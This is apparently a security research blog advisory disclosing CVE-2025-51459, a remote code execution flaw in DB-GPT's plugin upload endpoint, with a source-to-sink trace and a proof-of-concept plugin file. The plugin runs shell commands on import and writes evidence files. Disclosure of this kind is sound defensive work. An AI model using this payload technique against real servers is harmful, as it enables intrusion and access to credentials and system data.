Blog

CVE-2025-51459: DB-GPT RCE in DB-GPT Plugin Upload System

April 28, 2025 by Gecko Security Research · Medium 6.5

Remote code execution vulnerability in DB-GPT's plugin upload functionality through unsafe Python code execution.

Description

An RCE was found in the plugin upload functionality through the /v1/personal/agent/upload endpoint. While basic controls are in place for filename sanitization and path traversal prevention via _sanitize_filename(), there is no validation of the actual plugin code content. An attacker can upload a malicious Python file that passes the filename checks but contains arbitrary code. This code will be executed when the plugin is loaded through scan_plugins() during the refresh_plugins() call. The vulnerability is exploitable remotely through the FastAPI endpoint.

Source - Sink Analysis

  1. Source: personal_agent_upload() in packages/dbgpt-serve/src/dbgpt_serve/agent/hub/controller.py
  • Entry point accepting user file upload
    python
    @router.post("/v1/personal/agent/upload", response_model=Result[str])
  1. Intermediate: _sanitize_filename() in packages/dbgpt-serve/src/dbgpt_serve/agent/hub/plugin_hub.py
  • Sanitizes filename but does not validate code content:
    python
    safe_filename = self._sanitize_filename(doc_file.filename)
  1. Intermediate: scan_plugins() in packages/dbgpt-core/src/dbgpt/agent/resource/tool/autogpt/plugins_util.py
  • Loads and executes plugin code during import:
    python
    my_plugins = scan_plugins(self.plugin_dir, safe_filename)
  1. Sink: refresh_plugins() in packages/dbgpt-serve/src/dbgpt_serve/agent/hub/controller.py
  • Executes loaded plugin code through AutoGPTPluginToolPack:
    python
    module_plugin.refresh_plugins()

Proof of Concept:

The attack can be triggered through a single HTTP request to the /v1/personal/agent/upload endpoint, requires no special permissions or authentication beyond access to the endpoint, and code execution happens silently during the plugin loading process, even if plugin validation eventually fails.

Create malicious init.py with payload

python

# code executes immediately upon import
import os
import datetime
import subprocess
import socket

# create evidence file
timestamp = datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S")
with open('/tmp/rce_${EXPLOIT_ID}.txt', 'w') as f:
    f.write(f'RCE executed at {timestamp}\\n')
    f.write(f'Hostname: {socket.gethostname()}\\n')

# execute commands with root privileges
output = subprocess.check_output('whoami && id && hostname', shell=True).decode('utf-8')
with open('/tmp/rce_cmd_${EXPLOIT_ID}.txt', 'w') as f:
    f.write(output)

from auto_gpt_plugin_template import AutoGPTPluginTemplate

class ExploitPlugin(AutoGPTPluginTemplate):
    def __init__(self):
        super().__init__()
        self._name = "RCE-Demo"
        self._version = "0.1.0"
        self._description = "RCE demo"
    
    def can_handle_post_prompt(self):
        return False
        
    def post_prompt(self, prompt):
        return prompt

Impact

Attackers can:

  • Execute arbitrary code with the privileges of the user running DB-GPT (default root in containerized deployments).
  • Access sensitive information such as system files, environment variables, and credentials.
  • Establish persistence on the target system and pivot to other systems within the victim's network.

Fix

Product

DB-GPT

Vendor

Eosphoros AI

Version

0.7.0

CVSS

6.5

Summarize with AI
ChatGPTPerplexityGeminiGrokClaude